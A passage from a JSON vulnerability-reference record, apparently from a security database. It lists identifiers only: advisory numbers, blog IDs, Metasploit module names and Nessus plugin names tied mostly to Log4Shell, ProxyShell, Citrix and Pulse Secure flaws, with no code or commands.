"99D36C5A3B6C3FF496422C3FF600B7D254E5D81D1CC0F9184ECD1F8F03423FCD", "9B0F66C4EFFAAF9FDB1B504C2B624740D85D778570BFE202D803740E0C99076C", "9BBA472DF522BDB11A0F80EDDE168630BF88A9C15518FEE66140BBEE5585001A", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9DA9D6C05FE03758B84DC068193CB0E2A82B2F411E24F383722448967D77B355", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "9F34E4D3B1044507E18917B1E2BE1AF6051A228EE5F8F69E5539B48FDFAF3B4D", "A060C0BC5CF92D0F7B8D81075A33D4E2887EE843B41F417A28EC2BBAB72FCED9", "A2133DCF0D67EC30E5F3D15E39561490E1B16A2750CD5C806DC8F9E95825E247", "A22A62D71C3EEC00971E326ED7FCCDE4C2959771727429F852D98592C456C126", "A264D72AF012C33CABCDEE09605EBB277263FB33567A89DC0831C44257A7E37C", "A31AAAB46398C4CA9F3552FA53EB3F0DB8FD1384559E2048B5321E5BB6936FB2", "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "A3AEABE024AE1D8520A5BB495A67D45783D1F2AC4B3F9F3B682E75291FD8E20A", "A3BC60725F0EAC71F9F85D52468B5D776A02B53D2F6CC6F5075461F1867C9EA8", "A44F3C58E434BA15FF852853D94A3A21A868AF86E9655A8594367CADBE40A491", "A5803C821BBFCE3CF61C99A5753B13549E824EAC069265D225FFBDF6B568BCDB", "A61564D752A2637A5306DF51328148AB1D1EAAC0735226DD1D9F500C5DAECC37", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "A6B79EA77FF12E690D40F605757B18FA9561F56797862582866D9A26B345F82D", "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "A8769BC2B0DB66C792D9EFA7CBEF5668B22FB52A475E194FEB169B3B4BC31FD6", "A9139EA8D202B9FE20D64E771F1FC89C7E9393774315A6265F9CE70E716E1833", "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AAB14D78054A85A0638FC4EFD7F09686429CB02C6B45FF1ECAFA55C27A050635", "AB8881439FA512D752063B5AB323E9C076039DB482070536304B448AE092D8CD", "ABBECC2CF1F809CE932B9130A6788B28E3F6228FC5599EA3FB4CD8372D7EA7C8", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "ACEB831DB775B18663FB8C7ED41AB48BFEC59B9270C9444D8DADE42DF02434E0", "AD5C7F7150FBD846C587F5FAD0D7C7B48F81990F52A351F824E5CBBBAC83F163", "AE2FA11123F866B1C71B66A57712F1082B82D3EB4221232EC14E14446822A705", "AE98DBCCCCED8FE9C2F0A9A3294999AEF099215A25C0EDDDFD95DF899965A340", "AFF479D95FDAD4900AA4F096E105276FA32246E4CF2C4642D2BFEACB19522885", "AFFC971A929ABC4A5177F4FBA7D32B82C0ACBC71AEFBBD3E440D08B12B022B51", "B0A8BF7D544954AF5D193262AAD0DEAC7961A5AAEEC3623B441BB795753711B6", "B30C006BF323BCAF8E8EF0489319D47B3A0FB0928442F9EB350A3520109F9F72", "B431011ABF67E8DD4F4E3E4C9F9FD0B1E6E07733191BA7206314070644F2CAF0", "B4779B52313D85FE1157604480F675A0E2BA765BB08DE9BEA2664A6C3AD0F47B", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B5D3987D37FA57ECB44634029606786ADADCB0901EF9858232A7D33908EC5FD2", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B73437073599A5973472D300EA14AD94DB00FCC9790D93795D0BCA840608CBF4", "B735C91C5D46BD88FD491D67AB17706F0B9FDF9D50797EB4994A198C09D7FD04", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BAFF6760E68C0F676AFA3DA20E18B06BD703574BC65B9BFDBCD22ACCE05F7FEB", "BB76D9518CCBAE68500AB2DACF1AAAF9F5532441FD3A705A4E4A39114EEBDC0C", "BB785F5F4B456D5F3322E9222022F0E38411602612EBF72BC61AEEABF7FEC2A9", "BB96DF8C4863ECA5111B83DE1E5DBA4C67AC8E6999013404D8DD87C98CC7B60D", "BBA20026A90E4F85555F0C8BD6248AE07F7DE01D687CD62F0159CF4B22E7DA25", "BBB0C0E9DDF621A6AE6C42CB1DFF2B33670CE69032E5482B47DC24C860F78C9A", "BC3A1086428BA3DB72FFD49EA27AAB3A8A9FA0DD5D576D47E0467AE96C365754", "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "BFA9A84596ADAC3A47B31C43DD8574B1E532311E1F9B01F003F6AEFDDA4BAACF", "BFA9E5B9CD204137C5C40A62AFA0C09607B8FABF6ADAD16BDE69778F6E3530F1", "C04EDE0E9159DC9AE235755A284662F042D80745649864CE91E7E3E4563221F6", "C0CE38B8081A59A18598B204BF933579D5A04D57C0E8BBBEC053AC1350A2938C", "C1BEC46524F176FAE4CBB603AC283FC9F12029FC3579BBDE20A1B80FA597B0FC", "C3A579D5583598BF4F36F66A731C39A1C3E23351DFAFC16956E2C8DAB030AEBF", "C717E3C358B1EA0AC9E1701DBA722015744796BC3CBA66E7AD79D30CEB45BD60", "C741AA98787A9F837D93EA7D1268C62A551244CB826F0BEFDB076F796F78AB33", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "C810746DF12642CDB3444A565C3CE3ABFEFAE31EFE9FE6BC4718CE76334BEB88", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CBB6711004455A0722EAF33EA7E16444AE4DF08D1F9C341B64251DB448ACCBB4", "CCF869217B83C7570F586028248E128FA170E16792CBF3BAD70423425B1BD638", "CD617F98180D24BACD7FAE3B791B49B329F7F25DC885A6AD81CD6A815194B6BA", "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "CDC93F5A32848FF0073C48EDC66593F2A0A2AACCAE9802E843826C6E565AE2E9", "CDF01D5D29ED4731048DA0F1A6FDE407B2DA246B226E3DF9945EBC838B4660A1", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "CF56D9AEC134D68DA67A2476D2B87833F63F32777672C1C66A8D8FF69C08623B", "CFDD5A9C7B8C9F6AFEAF6B1C68FF8C11BEADF52EE2E731CBCD194CACB1898BD6", "D28370F3789940A6A2F0B48D0BB882F7E298E5B8C7167BC16F9FB06B92DBCF35", "D4AC8637482E0D53AE579FBD19E568DF643A9D732D1995CBEF53FC6B867F82DA", "D6A22AE665DEADE235C2738407D64638A424C6CC505B816BFEA12DEFCC5CD645", "D728283BFB4D0C3BC5C98FA880696DFC59C2A5FA652666E966D126A6D7FC92FA", "D78F8119FF4EBAA3EA6E8A906FCEFE0DB24B626AB87F3DFEBFA899904F726130", "D792D660667D934B582774E627CB3E2E010E497C8C1D9F4B7C138E4B5DC2ECEC", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "D9D2F8F1F4727F09E77272D6C8643C3016BCD6A8E4BC6E59B27B37256F4F8F76", "DACB3E9783156FCD47517FD5E71AA5A2242EAA043F56F2EA75EC325BA052BDDD", "DC086AC7F5679D9F84A3DA8B91FAB9C0F09EF5EFB4C8687216156974F51B6283", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "DE8C5DCB7F07498942725CF8F7905DBA001C7B89D3D36370CC303A274CB9A8EB", "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "E036688C47591ADE56001D0CD1013191D6F43940CA2DB9509F5FCF0F2469F92A", "E0F75591E2E6874A35B6A6C7681543B81128F5226E803A2CCE1D1B664BFC8638", "E141221C1C63036AE1C76B976A04706F4495C39812FC722478A0C755043A0E14", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E2E1AB8B9E10CF0970D428552F10FD3FEA7D405315E7CCA6431E3F0E8079B159", "E36B23DB3CC2EC748DF333353AEDE5A1F8FAA97C1F1DC67E27CD4759E7D0C960", "E3C82809E8425A65E53029135451CC9579AA725E2D85009F892DD0A0FD979ED9", "E41278F69BC61D835FAC88FBCE06075D73C74B99B009DE680A92B2B68FE577DB", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "E67F6EE1C05A0DFBB7E42F8DDE81795FCC3D933297C925E42690163F0C1D21A6", "E775C68CA18D51E91E688F1880BD5AF1955B5F4DF7397FA28CC721E37DAFB99A", "E7E10B1CFDE7DBAE5E93EB8EF50E03FCA4DAE3C0D9270B040B02BCEE5D0199B9", "E8302DECE1CECF16A05E7F8FBA08D33074F30279F18CDDBABA912B9C9DF9F32D", "E84CA6147175A22CB9253587142088EB24B6AE0BD11EC07E71E299F57DD05739", "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "EA69F3ACF81616FFD52E1EC0A74B074CC736B3675D7B61644018A9252D9BD284", "EACE8EC2B7164C19E5BA497C1D57887C847EC033403098801408B0F6BB2B6736", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "ED7164C07048A48E59D18BAADA456D0655A81F29CABBDEFA06735647C2B759EA", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EDA30B3C2FB2766DFAA280B3B5E960EC660172EBFF7B73A524DCE514A3A3F985", "EF05485B7227E17E422CCBDF0EC02D62F554406DEDDDC7A1772D75D577035F79", "EF5F7BA296D0A7B4B6CC058D9B89B1BFEE714F79C2BC4541813DA99A292450B9", "EF71291A92B5250A0A03CC8B24766E487991713BE06BEFF3A0428155C170ECB7", "EFA06779A2DA162F7F70171BAC9D53E998DA486C75081458549AFE875DB6E5B5", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B", "EFD4687D2DC8ADFBEC960932263D6DA222DDFA92899BC72A9B9D62B4331178A6", "F0166F21D9D8651F7C71CAAA5131EEC4CE044F990491482A736F6DD767A3EC0F", "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "F0806D2A2F2817DD3A11695DB658C0C7C64B134E8875822DCE8F5D73AC04E97B", "F16DAE77B5D6C7D782818596F851DFFB29226C0550922519EFC4250E27D09D67", "F18F021F8259C21D1B03D3A3C3F5FD97D6A165E424FE86F9986F545F5A914F8E", "F20E63C2D2D2AA05D977555688CD3131DF08DA240FDFCEB0B017DF8A789BCCEE", "F3EF1FC432D040B91FC6C5AEB324AF8CE32BCFB7A9A0360FC4722981B736F64F", "F435C74BF942E3B3A5FEF2B742E716E29826D42678DE6AB053B1766FC7314452", "F89923018671257EB76989AE7AB9D39396FBAD6F8846CB56D6915361F1CCCC48", "F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:4124E2CCDA610C6D222319C47C8D3250", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA11417", "KLA12169", "KLA12277", "KLA12278", "KLA12390", "KLA12392", "KLA12393", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:119877528847056004", "KITPLOIT:1207079539580982634", "KITPLOIT:1244156083583318186", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1624142243530526923", "KITPLOIT:1680589374755422772", "KITPLOIT:2590785192528609562", "KITPLOIT:2686676167278919598", "KITPLOIT:2722328714476257207", "KITPLOIT:3188944951765917430", "KITPLOIT:3456474172768099634", "KITPLOIT:3532211766929466258", "KITPLOIT:3697667464193804316", "KITPLOIT:3773942873037113539", "KITPLOIT:4033244480100620751", "KITPLOIT:4074521293617632933", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4421457840699592233", "KITPLOIT:4425790137948714912", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:4707889613618662864", "KITPLOIT:5104415481503400470", "KITPLOIT:5187040326820919368", "KITPLOIT:522409803487164759", "KITPLOIT:5230148353750207837", "KITPLOIT:5376485594298165648", "KITPLOIT:5397133847150975825", "KITPLOIT:5563730483162396602", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:5829195600312197311", "KITPLOIT:6422486000446318290", "KITPLOIT:6516544912632048506", "KITPLOIT:6759391622067035795", "KITPLOIT:698315176468431184", "KITPLOIT:7070039119688478663", "KITPLOIT:763105754466120590", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:816704453339226193", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871", "KITPLOIT:942518396640901655", "KITPLOIT:965198862441671998"]}, {"type": "krebs", "idList": ["KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC", "KREBS:62E2D32C0ABD1C4B8EA91C60B425255B", "KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1476491C6EB2E7829EC63A183A35CE8B", "MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-FREEBSD-HTTP-CITRIX_DIR_TRAVERSAL_RCE-", "MSF:EXPLOIT-LINUX-HTTP-PULSE_SECURE_GZIP_RCE-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:795E0A765679492C51FEFA2B19EAD597", "MMPC:A2F131E46442125176E4853C860A816C", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:C0F4687B18D53FB9596AD4FDF77092D8", "MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0604", "MS:CVE-2021-31207", "MS:CVE-2021-40444", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB4461630", "KB4462143", "KB4462155", "KB4462171", "KB4462184", "KB4462199", "KB4462202", "KB4462211", "KB5003435", "KB5005563"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:795E0A765679492C51FEFA2B19EAD597", "MSSECURE:8D599A5B631D1251230D906E6D71C774", "MSSECURE:A2F131E46442125176E4853C860A816C", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995674"]}, {"type": "nessus", "idList": ["701262.PRM", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "EULEROS_SA-2022-1276.NASL", "FORTIOS_FG-IR-18-384.NASL", "FORTIOS_FG-IR-18-384_DIRECT.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOSX_FORTIOS_FG-IR-18-384.NASL", "MACOS_SPLUNK_824.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "MOBILEIRON_LOG4SHELL.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2022-0038-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE-SA-44588.NASL", "PULSE_CONNECT_SECURE-SA44601.NASL", "PULSE_CONNECT_SECURE-SA44784.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "PULSE_POLICY_SECURE-SA-44588.NASL", "PULSE_POLICY_SECURE-SA44601.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "SMB_NT_MS19_FEB_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS19_MAR_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_MAY_EXCHANGE.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SONICWALL_SMA_SNWLID-2021-0001.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5223-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_112365", "WEB_APPLICATION_SCANNING_112366", "WEB_APPLICATION_SCANNING_112367", "WEB_APPLICATION_SCANNING_112368", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "osv", "idList": ["OSV:DLA-2842-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154146", "PACKETSTORM:154147", "PACKETSTORM:154176", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:156730", "PACKETSTORM:160619", "PACKETSTORM:163895", "PACKETSTORM:165214", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167317", "PACKETSTORM:167917"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:A8EE36FB3E891C73934CB1C60E3B3D41", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D8942BC5A4E89874A6FC2A8F7F74D3F1", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", 